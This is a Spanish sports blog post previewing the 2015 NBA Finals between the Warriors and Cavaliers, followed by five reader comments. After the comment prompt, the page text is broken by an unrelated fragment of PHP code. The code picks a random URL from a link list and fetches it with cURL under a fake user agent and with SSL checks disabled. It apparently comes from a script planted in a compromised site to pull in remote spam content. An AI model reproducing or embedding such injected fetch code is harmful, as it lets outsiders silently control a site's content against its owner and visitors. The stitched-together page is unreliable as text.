Previa Finales 2015: Golden State Warriors vs Cleveland Cavaliers

02 de June de 2015 por TheDeerHunter

Llega el inevitable epílogo a la campaña 2014/15. El apasionante clímax y, paradójicamente, el doloroso punto y final que nos vuelve a abocar a meses de tediosa privación. Aquí se resuelven todas las cuestiones que se han ido planteando durante el curso y nada del mismo tendría sentido sin su imprescindible conclusión.

Llegamos a este punto con déficit de emociones. Los dos aspirantes al anillo han resuelto sus eliminatorias con excesiva comodidad. El dramatismo natural del “win or go home” se ha disfrutado a cuenta gotas. Hemos echado en falta algunos imprescindibles de la liga (Durant, Westbrook, George, Melo, Love…) y otros llamados a “animar el cotarro” han llegado con el depósito “en reserva” (Mavs, Blazers, Grizzlies, Hawks, Raptors…) Hay quien considera que el nivel en la conferencia Este ha sido particularmente atroz durante esta postemporada y sólo la eliminatoria Cavs-Bulls salvó los muebles de forma indiscutible. En esta ocasión, sin embargo, nadie podrá decir que LeBron llega con ventaja por su asequible cuadro ya que los Warriors apenas han tenido que pisar el acelerador puntualmente para apabullar a sus rivales.

La final cuenta con estímulos de sobra para servirnos de redención. De entrada, tras dos años en que no hemos disfrutado de un duelo individual de máximo nivel vamos a poder dirimir la cuestión sobre si el oficial y discutido mejor jugador del año es capaz de superar al jugador más dominante de la liga y aspirante nada menos que al trono histórico. Al mismo tiempo los Warriors recogen el guante de los pasados campeones Spurs, con una filosofía eminentemente colectiva ante un Lebron James más “Iversonizado” que nunca por necesidades del guión. Algunos dicen que un anillo no hace mejor a un jugador y, probablemente sea cierto, pero la dimensión que le daría a LeBron doblegar a un equipazo como Warriors en estas condiciones frente a la posibilidad de firmar un 2-4 en sus finales disputadas es como la noche y el día en la consideración que todos le daríamos en esa particular carrera que él corre contra los mitos del pasado.

Love y Varejao en el dique seco e Irving en modo “Uncle Drew”. Enfrente una plantilla diseñada por el ejecutivo del año, coronada con el MVP, apuntalada por el segundo jugador más mejorado y dirigida por el segundo “Coach of the Year” que, recuperando a Speights, puede poner en liza a 10-11 jugadores importantes. Los “Splash Brothers” probablemente sean el dúo con el tiro exterior más letal de la historia y gente como Andrew Bogut, Draymond Green o Andre Iguodala están considerados entre los mejores especialistas defensivos en su posición. Variantes tácticas no van a faltar a los Warriors. Si LeBron soñaba con una oportunidad para hacer algo verdaderamente grande la tiene delante. “The Decision” quedaría para siempre enterrada en el baul de los reproches. La perfecta parábola del hijo pródigo para contar a nuestros nietos.

Claves de la eliminatoria:

El emparejamiento Irving-Curry: En condiciones normales hablamos del duelo de jugones por antonomasia. Fácilmente los dos mejores con diferencia en el manejo de balón de toda la liga. Sin embargo es previsible que Stephen Curry llegue al 100% tras una semana recuperándose del batacazo que se dió en el 4º ante Houston. No será así en el caso de Kyrie Irving con una significativa lista de problemas físicos a cuestas. Dilema nada baladí para David Blatt, pues Irving difícilmente puede emparejarse con nadie que no sea Curry. El MVP de la liga se frota las manos ante semejante “perro de presa”. Sólo si Irving cuenta con piernas para hacer sufrir defensivamente a su par se justificará su presencia en pista, de otra forma perderá muchos minutos en detrimento del rocoso Matthew Dellavedova. Con él en pista, eso sí, los Cavs registran unos ratios defensivos más que interesantes.

– The answer is LeBron: Al contrario de lo que puede parecer a LeBron no le ha sentado excesivamente bien su “soledad” en términos puramente anotadores. 27.6 puntos pero lanzando 25 tiros por partido con un 42.8%TC y un doloroso 17.6% en triples. Viene de doblegar a bichos como Jimmy Butler y DeMarre Carroll pero los Warriors también cuentan con bazas defensivas más que notables. Veremos principalmente a Harrison Barnes e Iggy turnándose en su marca, aunque la versatilidad de Draymond Green y Shaun Livingston abre más el abanico de opciones. En medio Bogut negando el juego cerca del aro si LeBron sigue errático a media-larga distancia. Los Warriors llevan tiempo demostrando que no se chupan el dedo en términos defensivos. Con todo King James siempre es mucho más que anotación.

– Hay que coger el paraguas no vaya a ser que llueva: Buena parte de la diferencia que han marcado ambos equipos se explica desde la larga distancia. 10.4 de 29 intentos de los Cavs frente a 11.5 de 30 de los Warriors. No sólo del “record-man” Curry viven los de la Bahía mientras que la efectividad de hombres como JR Smith, Iman Shumpert, James Jones o el mismo Dellavedova (y curiosamente no LeBron) estropea un poco la épica del “sólo ante el peligro”. En la defensa de perímetro los espartanos Cavs no funcionaron tan bien como parece ante los Hawks y llegaron, por ejemplo, a conceder 30 triples no defendidos en el tercer encuentro de la serie, de los cuales los halcones sólo acertaron a embocar 4. Los Warriors salivan pensando en facilidades semejantes, ya que ellos clavan el 40% de esos tiros. Por su lado los hombres de Kerr han tenido muchos momentos de dejarse llevar y eso en una final como ésta no se lo deberían permitir.

– X-Men: Sin contar a Curry y Klay Thompson, Kerr dispone de Draymond Green, Bogut, Barnes, el renacido Iguodala, Livingston o Marresse Speights como hombres que han sacado las castañas del fuego en momentos de máxima tensión. Por calidad tampoco debería extrañar mucho que lo hagan David Lee o Leandro Barbosa. Blatt maneja una plantilla mucho más limitada en efectivos, con apenas 7 hombres nada más en ausencia de Irving. Otra de las virtudes de LeBron ha sido la de encontrar socios inesperados en los peores momentos y estaríamos siendo muy injustos de no reconocer el decisivo impacto de hombres como JR Smith y Tristan Thompson. En realidad el excelente estado de forma en el que han llegado esos 7 “desheredados” a esta final es la principal baza de los Cavaliers.

– El manido small-ball: Con un bicharraco como LeBron, con un tamaño y fortaleza de ala-pívot clásico pero velocidad y tiro de base/escolta, el small-ball siempre fue un recurso demoledor para sus rivales, llevando el juego a su terreno y desconcertando juegos interiores más poderosos. Popovich encontró el antídoto el año pasado y Kerr viene con la lección aprendida. Tienen ensayado con éxito la misma treta y en ese sentido Draymond Green es un jugador perfecto.

– La ventaja campo: Los Warriors sólo han perdido 3 partidos en el Oracle Arena en todo el curso. Dice LeBron que lo que más le motiva es hacer callar a gradas hostiles. Por lo que vimos de Curry en Houston tienen gustos parecidos.

Pronóstico: Ante Lebron James nunca se sabe, pero veo a los Warriors demasiado superiores a todos los equipos de la liga. Confiemos que los Cavs sean capaces de llevar esta final al máximo nivel de competitividad y emoción, pero difícilmente Stephen Curry y compañía permitirán llegar al 7º encuentro. 4-2 para ellos si no pasa nada raro.

Comenta

5 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Qué ganas.

      Citar

  2. Triceratops dice:
    #2

    4-1 para los Warriors con bastante probabilidad de 4-0.
    Si Lebron es capaz de llevarse el anillo con Love out., Irving al 50% y un puñado de jugadores de medio pelo, habría que ponerle el altar casi a la altura de Jordan. No creo que lo consiga, de todos modos.

      Citar

  3. Viva_Dirk dice:
    #3

    No hay duelo individual alguno hombre, se trata del mejor equipo contra el mejor jugador. Todo lo que no sea un 4-1 o 4-0 es un éxito para LeBron, de hecho que pongas directamente 4-2 es que algo de cagómetro hay encendido.

      Citar

  4. TheDeerHunter dice:
    #4

    Viva_Dirk:
    No hay duelo individual alguno hombre, se trata del mejor equipo contra el mejor jugador. Todo lo que no sea un 4-1 o 4-0 es un éxito para LeBron, de hecho que pongas directamente 4-2 es que algo de cagómetro hay encendido.

    Por mucho que se diga y obviando las ausencias los Cavs llegan en muy buena forma. Cuánto tiempo hará que no hemos visto en este nivel a JR Smith, Tristan Thompson e Iman Shumpert… si es que les hemos visto alguna vez así. En cambio los Warriors apenas han tenido que pisar el acelerador en todo el curso y tienen un punto de tendencia a intermitencias mentales. En este escenario no preveo barrida y el formato de la final le amplía las opciones de rascar otra victoria. Con el formato habitual hubiera apostado por el 4-1 claro.
    Por otro lado me parece asombroso tanta venda antes de la herida y tanta excusa preventiva. Un jugador tan grande como LeBron no merece tanta condescendencia. Aquello de por lo de empezar nuevo proyecto no ha ganado el MVP, como si no hubieran habido MVPs que comenzaban nuevos proyectos, o lo que dices ahora…como si LeBron no hubiera abusado en toda su vida de equipos inferiores…
    Veremos un apasionante duelo individual Curry vs LeBron de eso no me cabe duda. El mejor jugador de este año contra el mejor jugador del pasado lustro. Si además los Warriors demuestran ser tan sumamente superiores colectivamente como mucha gente piensa efectivamente no habrá serie.

      Citar

  5. Vader dice:
    #5

    Yo tmb veo favorito a Warriors. Sólo con Irving a tope y un JR y Shumpert muy inspirados podrían plantar cara. Lo más probable es que veamos exhibiciones de pundonor de Lebron al estilo rey Leonidas para terminar perdiendo los partidos. Eso sí, estos playoff habran sido un cursillo de experiencia fantasticos para estos jovenes Cavs, serán un equipo peligrosisimo los próximos años.

    Fin de semana de final de champions y final NBA!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>